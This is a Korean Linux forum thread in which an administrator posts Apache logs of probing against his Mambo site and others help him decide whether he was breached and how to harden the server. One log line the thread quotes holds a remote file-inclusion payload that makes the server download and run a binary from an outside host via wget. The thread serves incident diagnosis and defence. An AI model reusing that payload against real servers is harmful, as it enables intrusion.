208.189.21.236 - - [20/Dec/2005:16:02:02 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
208.189.21.236 - - [20/Dec/2005:16:02:03 -1000] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
208.189.21.236 - - [20/Dec/2005:16:02:04 -1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
208.189.21.236 - - [20/Dec/2005:16:02:06 -1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
208.189.21.236 - - [20/Dec/2005:16:02:07 -1000] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
208.189.21.236 - - [20/Dec/2005:16:02:08 -1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
208.189.21.236 - - [20/Dec/2005:16:02:09 -1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
208.189.21.236 - - [20/Dec/2005:16:02:10 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
208.189.21.236 - - [20/Dec/2005:16:02:11 -1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
208.189.21.236 - - [20/Dec/2005:16:02:13 -1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:18:41:22 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:18:41:24 -1000] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:18:41:25 -1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:18:41:26 -1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:18:41:28 -1000] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:18:41:29 -1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:18:41:30 -1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:18:41:32 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:18:41:33 -1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:18:41:35 -1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
194.143.202.203 - - [21/Dec/2005:00:16:04 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
194.143.202.203 - - [21/Dec/2005:00:16:05 -1000] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
194.143.202.203 - - [21/Dec/2005:00:16:06 -1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
194.143.202.203 - - [21/Dec/2005:00:16:08 -1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
194.143.202.203 - - [21/Dec/2005:00:16:12 -1000] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
194.143.202.203 - - [21/Dec/2005:00:16:13 -1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
194.143.202.203 - - [21/Dec/2005:00:16:14 -1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
194.143.202.203 - - [21/Dec/2005:00:16:16 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
194.143.202.203 - - [21/Dec/2005:00:16:17 -1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
194.143.202.203 - - [21/Dec/2005:00:16:18 -1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.99.188.107 - - [21/Dec/2005:01:36:16 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.99.188.107 - - [21/Dec/2005:01:36:18 -1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.99.188.107 - - [21/Dec/2005:01:36:17 -1000] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.99.188.107 - - [21/Dec/2005:01:36:21 -1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.99.188.107 - - [21/Dec/2005:01:36:24 -1000] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
211.99.188.107 - - [21/Dec/2005:01:36:27 -1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.99.188.107 - - [21/Dec/2005:01:36:28 -1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.99.188.107 - - [21/Dec/2005:01:36:29 -1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
211.99.188.107 - - [21/Dec/2005:01:36:28 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.99.188.107 - - [21/Dec/2005:01:36:30 -1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
200.167.18.130 - - [21/Dec/2005:06:35:49 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.167.18.130 - - [21/Dec/2005:06:35:50 -1000] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.167.18.130 - - [21/Dec/2005:06:35:52 -1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.167.18.130 - - [21/Dec/2005:06:35:54 -1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.167.18.130 - - [21/Dec/2005:06:35:56 -1000] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
200.167.18.130 - - [21/Dec/2005:06:35:57 -1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.167.18.130 - - [21/Dec/2005:06:35:59 -1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.167.18.130 - - [21/Dec/2005:06:36:01 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.167.18.130 - - [21/Dec/2005:06:36:02 -1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
200.167.18.130 - - [21/Dec/2005:06:36:04 -1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
194.95.64.19 - - [21/Dec/2005:11:31:09 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
194.95.64.19 - - [21/Dec/2005:11:31:11 -1000] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
194.95.64.19 - - [21/Dec/2005:11:31:12 -1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

--More--

George double you Bush has two brains, the left and the right, like normal people. But the problem is that there is nothing right in his left brain and there is nothing left in his right brain"

오리주둥이의 이미지

멀 이리 자세히 많이 뿌리셨습니까. 쿨럭; -_-;;

cmd관련으로 찾아보시고 그 중에 200이 있는지 확인해보세요. 있다면 뚫린겁니다.-_-;
예측컨데wget 같은 명령어도 함께 들어있을겁니다.
보통 뚫릴경우에는 wget로 다운을받게하는 동시에 실행까지 ( 압축풀고 설치까지 ) 동시에 합니다.
이때에는 이미 백도어가 열린상태이므로 늦었습니다.
특정 보지못하는 포트가 있는지도 확인하세요.
어차피 크래커가 백도어로 들어오지 않고 있는 시간엔 포트를 확인해도 소용은 없지만요. -_-;;;

위의 상황으로는 뚫리지는 않은것 같습니다.
POST가 무조건 크래킹당했다는건 아닙니다. get이라고 보시면 되는데.. 좀 차이가 있습니다요.

가령 로그인도 방식에따라 get이나 POST로 표현이 될 수 있습니다.
POST중에서 의심스러운걸 확인해보라는 말씀이었습니다. 쿨럭;

opiokane의 이미지

ㅎㅎ...아뇨..그런 뜻이 아니라..
있지도 않은 것들에 POST를 하고 있으니
어떤 분이 계속 크랙을 시도하고 있다고 생각이 됩니다.
위의 POST들은 모두 의심스러운 걸요.

앗 그리고 오리주둥이님 말슴대로 확인해보니..
cmd에 wget이 들어 있는 것들이 왕창 있네요. 모두 -1000 입니다.

예를들어

83.16.226.118 - - [23/Dec/2005:15:58:52 -1000] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

요런 것들 말씀이시죠?
/modules/Forums/admin/admin_styles.phpadmin_styles.php 같은 것은 있지도 않은데...
그런데 해당 도메인이 mambo라는 CMS를 사용하는데, 그와 관련된 것도 잔뜩 있습니다..역시 그것이 문제였던 것 같습니다....쩝, Joomla, mambo community에다가도 알려야겠네요.

오리님 넘 감사...언제 하와이 놀러오시면 누드비치도 델구가고 잼있게 해드릴께요.

George double you Bush has two brains, the left and the right, like normal people. But the problem is that there is nothing right in his left brain and there is nothing left in his right brain"

opiokane의 이미지

제 생각으로는 mambo의 코드 중에 문제가 있었는데,
제가 별 조치는 아니지만 이것 저것 하고 나서 다시 크랙을
시도하는 것 아닌가 싶습니다....
특히 제가 멍청하게 php 코드들 중 owner를 root로 해 두었던
것들이 있었거든요....이런 것은 문제가 발생하지 않나요?

애거...APM 밖에 없으니 다시 까는 것이 대단한 것은 아니지만,
mysql 백업하고 다시 리스토어 해서 제대로 성고한 적이
한번도 없는데....OTL

George double you Bush has two brains, the left and the right, like normal people. But the problem is that there is nothing right in his left brain and there is nothing left in his right brain"

오리주둥이의 이미지

원래 마구잡이로 있지도 않은곳에 명령어를 뿌립니다.
있으면 뚫리니까요. -_-;
보안관련 헛점이 있는 몇몇 게시판관련이 특히 많이 나옵니다.
뚫리지는 않으셨네요.
위의 코드만 봐서는요.
포트스 역시 없는것이라면 시도를 지속적으로 하는것입니다.

그리고 말이죠 원래 죽어라 시도합니다. -_-
저희 서버도 로그보면 종종 뚫으려고 난리를 치다 포기하고 나가더군요. 쿨럭;

그리고 root로 되어있건 nobody로 되어있건 상관없이 뚫립니다.
보안헛점있는 게시판이나 프로그램 사용하면요.
어차피 80포트라서요. -_-;

mysql은 가장 무식한 방법으로 dump 뜨시지 말고 데이타디렉토리를 통째로 내려받으신 후 다시 올리시면 될듯.. -_-; 소유권만 mysql mysql로 다 바꾸시구요.

전 백업도 dump 안뜨고 디렉토리 통째로 받습니다. -_-;

오리주둥이의 이미지

참. 웹이 안뜨셨다고 했죠?
어쨌든 크랙은 당하셨다가 거의 확실합니다. 미세요!!
밀음신 강림~!!!!!

opiokane의 이미지

근데 문제가 밀어도 각 종 php 코드들 그대로 집어 넣으면,
같은 분이 같은 방법으로 시도하면 똑 같이 뚫리지 않을까요?

웹이 안뜨길래 ps aux 해 보니까 (위에 설명처럼)
다른 프로세스들은 그대로 있고 httpd가 모두 없으며 중간에

www-data (이 사이에 들어가는 뻔한 것들) Touch By ijoo

이렇게 되어 있더라고요.

George double you Bush has two brains, the left and the right, like normal people. But the problem is that there is nothing right in his left brain and there is nothing left in his right brain"

오리주둥이의 이미지

그렇지요. -_-; 뚫린 php 가 어떤건지 찾아내어서 해결후에 .. 쿨럭;
어디엔가 분명히 로그가 남아있을듯 한데..
다 뒤지시려면.. -_-;;;;

혹시 모르니 ssh쪽 로그도..-_-;; 갈수록 어려운 상황만 만들어드려서 죄송합니다.
혹시 제로보드같은 상용게시판도 사용하시나요?

이번에 IDC쪽에서 서버호스팅하는 업체의 서버가 뚫려서 해결해주고 왔는데
제로보드의 zero-vote 스킨이 보안구멍의 천국이더만요. +_+

opiokane의 이미지

제로보드는 안 쓰고 gnuboard를 하나 쓰긴 하는데....
뭐 트래픽이 많지않은 서버니까 로그를 다 보는데는
하루 정도면 되지 않을까 생각이 들어요.
이미 rotate 된 것들 다 열어봐야 하는데...
트래픽도 별로 없는 도메인이 6개나 되어서...쩝

아 크리스마스에 얼마나 좋은 선물인지...흑.
그렇잖아도 오리님 IDC 다녀오신 이야기 봤는데,
그것도 부족해서 제가 또 귀찮게 해드리고 있군요.
또 소주드시러 가시는 것 아닌가 몰러....

취미삼아 갖고 있는 서버들이 몇년동한 한번도
뚫린 적 없다고(아니면 뚫린 것 모르고??) 탱자탱자했는데.
꼭 한창 바쁠때 이런 일 생기더라... 흑.

꼭 찾아내어서 KLDP 커뮤니티에 좋은 기여를 해야 되는데....

George double you Bush has two brains, the left and the right, like normal people. But the problem is that there is nothing right in his left brain and there is nothing left in his right brain"

atie의 이미지

처음 글을 봤을 때 웹으로 들어왔구나 생각이 들었고 서버 OS를 다시 설치해도 단지 시간의 문제일 뿐 다시 같은 일을 언제나 겪을 수 있다고 생각이 들었습니다. 지적하신대로 php 혹은 mambo 코드의 어느 부분이 취약한 지를 규명해서 막아야 단기간에 재차 문제가 발생하는 것을 막을 수 있을 겁니다. 에러 로그와 억세스 로그를 시간별로 나열해서 검토해 보면 무엇이 시도되다가 어디가 뚫려는지를 좁힐 수 있을 것이고 그것이 코드의 취약점이나 설정에 연관이 있다면 역추적이 되겠죠.

병행해서 이미 하셨겠지만, 네트웍 상의 포트를 제한해서 특정 포트는 관리자에게만 할당하고 웹 포트가 모두에게 열렸다면 인증을 쓰는 방법으로 사용자를 걸러내는 방법을 도입하는 것이 좋겠습니다. 그리고, 가능하면 웹과 디비는 기계를 분리해서 차후의 피해를 최소화 하는 것도 서비스를 안정적으로 운영하는 방법일 듯 합니다.

불안(?)하게 운영을 점검하는 편 보다는 방책을 세우고 새로 설치한 후에 적용을 하는 편이 좋겠다는 생각입니다.

----
I paint objects as I think them, not as I see them.
atie's minipage

opiokane의 이미지

아...200 이 있습니다.
68.121.111.157 - - [19/Dec/2005:17:39:17 -1000] "POST /kr/index.php?option=com_mamboor&Itemid=26&openrealty=616374696f6e3d6164645f6c697374696e675f70726f70657274795f636c6173732661646d696e3d74727565 HTTP/1.1" 200 17709 "http://www.******.com/kr/index.php?option=com_mamboor&Itemid=26&openrealty=616374696f6e3d6164645f6c697374696e675f70726f70657274795f636c617373266..." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

68.121.111.157 은 저하고 상관없는 IP고요...
이게 문제일까요?

저는 취미긴 한데 제가 아는 분들의 회사 웹을 넣어 놓은 것이 몇개나 있는데...

George double you Bush has two brains, the left and the right, like normal people. But the problem is that there is nothing right in his left brain and there is nothing left in his right brain"

오리주둥이의 이미지

opiokane wrote:
아...200 이 있습니다.
68.121.111.157 - - [19/Dec/2005:17:39:17 -1000] "POST /kr/index.php?option=com_mamboor&Itemid=26&openrealty=616374696f6e3d6164645f6c697374696e675f70726f70657274795f636c6173732661646d696e3d74727565 HTTP/1.1" 200 17709 "http://www.******.com/kr/index.php?option=com_mamboor&Itemid=26&openrealty=616374696f6e3d6164645f6c697374696e675f70726f70657274795f636c617373266..." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

68.121.111.157 은 저하고 상관없는 IP고요...
이게 문제일까요?

200의 경우가 무조건 해킹당하는건 아닙니다. get 자체도 200이라고 보시면 되요.

위에서 보시면 400인가는 차단했다는 이야기입니다. 404는 파일이 없으므로 무효라는 뜻이구요.

위의 로그를 봐서는 로그인같은 특정행동을 했거나 뚫렸거나 한것 같습니다.

IP는 미국쪽이네요. 후이즈가 미국쪽으로 나옵니다.
아, 미국에 계시지 참. -_-;;

이제 뭐가 문제인지 알았네요. 미세요. -_-;;

opiokane의 이미지

spec 문서를 보니까,
POST에 대한 200의 의미는 아래와 같은데...
-----------------------------------------

10.2.1 200 OK

The request has succeeded. The information returned with the response is dependent on the method used in the request, for example:

GET an entity corresponding to the requested resource is sent in the response;

HEAD the entity-header fields corresponding to the requested resource are sent in the response without any message-body;

POST an entity describing or containing the result of the action;

TRACE an entity containing the request message as received by the end server.

-------------------------
아 이거 점점 제 아바타와 같은 심정이 되어가고 있습니다.

George double you Bush has two brains, the left and the right, like normal people. But the problem is that there is nothing right in his left brain and there is nothing left in his right brain"

오리주둥이의 이미지

200의 경우와 400대의 경우로 크게 나뉩니다.
200은 허용을 의미하는데 POST의 내용만으로는 제가 머라 말씀을 못드리겠습니다.

저번에 서울시청 홈페이지 변조사건이 발생했을때
POST로그가 있었고 200으로 허용이 되어있었습니다.
따라서 위의 index.php에 관련해서 개발한 개발자에게 연락을 하셔서
POST로 사이트를 접근이 되도록 개발을 한 부분이 있는지 물어보시는게 가장 빠를듯 합니다.

저도 확실히는 몰라서 머라고 대답은 이이상은 못해드리겠습니다만
위에 적으신 로그중에 동일한 ip 대역에서 존재하지도 않는 디렉토리들 ( 흔히 많이 알려진 프로그램들의 디렉토리를 찾는것으로 보아 보안문제가 알려져있는것들이라고 생각합니다.)을 가져가려고 하였고 그러다 다 막혔습니다. (400)

그래서 위의 200은 의심해 볼 여지가 있는것이죠.
index.php에 관련해서 개발자에게 멱살잡고 너땜에 뚫렸다고 협박 후
물어보세요. 아니요 라는 대답을 듣는 순간 깨끗해진 서버에서 뵈요. 쿨럭;

익명 사용자의 이미지

opiokane wrote:
근데 문제가 밀어도 각 종 php 코드들 그대로 집어 넣으면,
같은 분이 같은 방법으로 시도하면 똑 같이 뚫리지 않을까요?

당연히 뚫리죠! OS가 무엇이든 (OpenBSD)라 할지라도 제대로 설정이 안되었다면 뚫리긴 마찬가집니다.

OS 설치 직후, hardening/bastionizing 하고 필요에 따라 서비스는 chroot를 이용하여 jail에서 서비스하고, 각종 백업, 로그검사, root kit 검사, 파일시스템 변경 검사(aide/tripwire), firewall 설정 등등 신경 제대로 안써주면 언젠가는 뚫리고, 뚫린 것을 발견하기도 어려우며, 뚫린 것을 알게 되더라도 복구할 수 없게 됩니다. 제가 운영중인 서버는 매일같이 백업, 로그검사, 루트킷검사, 파일시스템 변경검사를 하며, 이상 징후 발견시 이메일 날려주는데, 이런 것 없이 서버 운영하는 것은 길가에 어린애 내 놓은 것과 비슷합니다.

최소한 'Linux server security'라는 책에서 권하는 정도는 구현해 놓아야 할 겁니다.

opiokane의 이미지

흑흑....
파일이나 DB들은 모두 백업에 대한 조치들이 되어 있는데,
일단 Firewall이라도 앞에 놓고 웹서버 운영할까봐요...
아아...역시 good old html이 최고라고 생각드네요.
갈수록 기능이 많아지는 PHP가 점점 신뢰가 안가고요.
옛날에 웹페이지들이 단순하던때...파일 받을 일 잇으면
ftp로 연결이나 해서 받고 그러던 때가 그립군요...

너무 늦어서 오늘은 이만 자야겠어요.

George double you Bush has two brains, the left and the right, like normal people. But the problem is that there is nothing right in his left brain and there is nothing left in his right brain"

익명 사용자의 이미지

opiokane wrote:
흑흑....
파일이나 DB들은 모두 백업에 대한 조치들이 되어 있는데,
일단 Firewall이라도 앞에 놓고 웹서버 운영할까봐요...
아아...역시 good old html이 최고라고 생각드네요.
갈수록 기능이 많아지는 PHP가 점점 신뢰가 안가고요.
옛날에 웹페이지들이 단순하던때...파일 받을 일 잇으면
ftp로 연결이나 해서 받고 그러던 때가 그립군요...

너무 늦어서 오늘은 이만 자야겠어요.

웹으로 뚫렸다면 firewall도 큰 도움 안될 수 있습니다(이미 리눅스라면 iptables 로 firewall 구현가능합니다). 또, ftp는 사용안하는 것이 좋습니다(scp, ssh 사용). 관련 os 보안 관련 업데이트 메일링 리스트는 꼭 구독하고 자신에게 해당되는 경우 바로 업데이트 하는 것도 잊지 말아야 합니다. 너무 늦었다고 해서 이상하다고 생각했는데, 하와이였군요. Happy Christmas!

superkkt의 이미지

서버 용도가 정확히 뭔지 모르겠지만 일단은 관리자가 제어할 수 있는 웹사이트 하나만 돌아가는 서버는 아닌듯 싶네요. 이런 경우라면 그냥 nobody 권한은 공격자에게 넘겨줬다고 생각하고 관리를 하는게 정신건강에 좋습니다.

그럼 관리자가 할 일은 nobody 권한을 획득한 공격자를 어떻게 효율적으로 막아서 권한상승을 하지 못하도록하냐인데.. 여기에는 여러가지 방법이 있을겁니다.

저같은 경우는 ACL을 사용해서 /bin/sh을 제외한 모든 실행가능한 바이너리 파일들에 nobody가 접근하지 못하도록 설정했습니다. 그리고 FTP 설정에서 유저가 퍼미션을 변경하지 못하도록하고 마지막으로 IPTABLE을 사용해서 서비스중인 포트 외에는 외부에서 들어오지 못하도록 막았습니다.

======================
BLOG : http://superkkt.com

오리주둥이의 이미지

Anonymous wrote:
opiokane wrote:
흑흑....
파일이나 DB들은 모두 백업에 대한 조치들이 되어 있는데,
일단 Firewall이라도 앞에 놓고 웹서버 운영할까봐요...
아아...역시 good old html이 최고라고 생각드네요.
갈수록 기능이 많아지는 PHP가 점점 신뢰가 안가고요.
옛날에 웹페이지들이 단순하던때...파일 받을 일 잇으면
ftp로 연결이나 해서 받고 그러던 때가 그립군요...

너무 늦어서 오늘은 이만 자야겠어요.

웹으로 뚫렸다면 firewall도 큰 도움 안될 수 있습니다(이미 리눅스라면 iptables 로 firewall 구현가능합니다). 또, ftp는 사용안하는 것이 좋습니다(scp, ssh 사용). 관련 os 보안 관련 업데이트 메일링 리스트는 꼭 구독하고 자신에게 해당되는 경우 바로 업데이트 하는 것도 잊지 말아야 합니다. 너무 늦었다고 해서 이상하다고 생각했는데, 하와이였군요. Happy Christmas!

ssh 계열도 실제로는 요즘은 거의 뚫립니다. 게다가 패킷으로만 처리하는 iptables 같은경우는 방화벽이라 보기 힘듭니다.
실제로 iptables 가 있어도 뚫리는경우가 많이 있습니다.

최소 L2스위치 이상의 스위치단에서 커버를 하는 수 밖에 없습니다.
윗단에 물리적 방화벽도 전문적으로 뚫는 사람들도 있긴하지만
현재와 같이 불특정 서버에 침투하는 사람들은 스위치단에서도 거의 막을 수 있습니다.

실제로 백도어 프로그램의 세팅을 보면 iptables 까지 체크를 하고 들어갈 수 있도록 되어있는 걸 보실 수 있을겁니다.

어차피 php역시 짜는 사람이 전문적인 지식을 가지고 하면
문제의 소지가 줄어드니 php를 너무 미워하지는 마셔요. ^^

가장 근본적으로는 트래픽의 변화량을 늘 지켜보시는것이 가장 현명할듯 하네요.
MRTG 보다는 RRDTool이 더 좋지 않을까 하는 생각이.. 쿨럭;;;

오리주둥이의 이미지

superkkt wrote:
서버 용도가 정확히 뭔지 모르겠지만 일단은 관리자가 제어할 수 있는 웹사이트 하나만 돌아가는 서버는 아닌듯 싶네요. 이런 경우라면 그냥 nobody 권한은 공격자에게 넘겨줬다고 생각하고 관리를 하는게 정신건강에 좋습니다.

그럼 관리자가 할 일은 nobody 권한을 획득한 공격자를 어떻게 효율적으로 막아서 권한상승을 하지 못하도록하냐인데.. 여기에는 여러가지 방법이 있을겁니다.

저같은 경우는 ACL을 사용해서 /bin/sh을 제외한 모든 실행가능한 바이너리 파일들에 nobody가 접근하지 못하도록 설정했습니다. 그리고 FTP 설정에서 유저가 퍼미션을 변경하지 못하도록하고 마지막으로 IPTABLE을 사용해서 서비스중인 포트 외에는 외부에서 들어오지 못하도록 막았습니다.

ACL에 대해 당장 검색하러 가봐야겠습니다. +_+

그리고 웹호스팅 같은경우에는 유저가 퍼미션을 조절하지 못하도록 한다면 상당한 제약일것 같은데요.

웹호스팅같은 불특정다수에대한 서비스가 아니라면 큰 문제되지는 않겠지만요.

조만간 저희서버도 chroot디렉토리이상 침투못하도록 작업을 해야 할 것 같습니다.
귀찮아서 안하고 있었는데.. 추륵 ㅜ.ㅡ

익명 사용자의 이미지

오리주둥이 wrote:
Anonymous wrote:

웹으로 뚫렸다면 firewall도 큰 도움 안될 수 있습니다(이미 리눅스라면 iptables 로 firewall 구현가능합니다). 또, ftp는 사용안하는 것이 좋습니다(scp, ssh 사용). 관련 os 보안 관련 업데이트 메일링 리스트는 꼭 구독하고 자신에게 해당되는 경우 바로 업데이트 하는 것도 잊지 말아야 합니다. 너무 늦었다고 해서 이상하다고 생각했는데, 하와이였군요. Happy Christmas!

ssh 계열도 실제로는 요즘은 거의 뚫립니다. 게다가 패킷으로만 처리하는 iptables 같은경우는 방화벽이라 보기 힘듭니다.
실제로 iptables 가 있어도 뚫리는경우가 많이 있습니다.

최소 L2스위치 이상의 스위치단에서 커버를 하는 수 밖에 없습니다.
윗단에 물리적 방화벽도 전문적으로 뚫는 사람들도 있긴하지만
현재와 같이 불특정 서버에 침투하는 사람들은 스위치단에서도 거의 막을 수 있습니다.

실제로 백도어 프로그램의 세팅을 보면 iptables 까지 체크를 하고 들어갈 수 있도록 되어있는 걸 보실 수 있을겁니다.

어차피 php역시 짜는 사람이 전문적인 지식을 가지고 하면
문제의 소지가 줄어드니 php를 너무 미워하지는 마셔요. ^^

가장 근본적으로는 트래픽의 변화량을 늘 지켜보시는것이 가장 현명할듯 하네요.
MRTG 보다는 RRDTool이 더 좋지 않을까 하는 생각이.. 쿨럭;;;


ssh 가 어떤 식으로 뚫리는지 궁금합니다. iptables는 stateful packet 처리 가능한데, 어떤 면에서 전용(상업용) 방화벽과 다른가요? (같다고 알고 있는데 다른가요? 물론 그 외 기능이 있는 것도 있긴 하지만) 그럼 iptables로 전용 firewall machine 꾸미는 것은 의미가 없나요? iptables 체크한다는 것은 퍼미션이 주어질 때 이야기 아닌가요? (적고 보니 질문만 5-6개 연속인 듯 하군요)
opiokane의 이미지

오리주둥이 wrote:
superkkt wrote:
서버 용도가 정확히 뭔지 모르겠지만 일단은 관리자가 제어할 수 있는 웹사이트 하나만 돌아가는 서버는 아닌듯 싶네요. 이런 경우라면 그냥 nobody 권한은 공격자에게 넘겨줬다고 생각하고 관리를 하는게 정신건강에 좋습니다.

그럼 관리자가 할 일은 nobody 권한을 획득한 공격자를 어떻게 효율적으로 막아서 권한상승을 하지 못하도록하냐인데.. 여기에는 여러가지 방법이 있을겁니다.

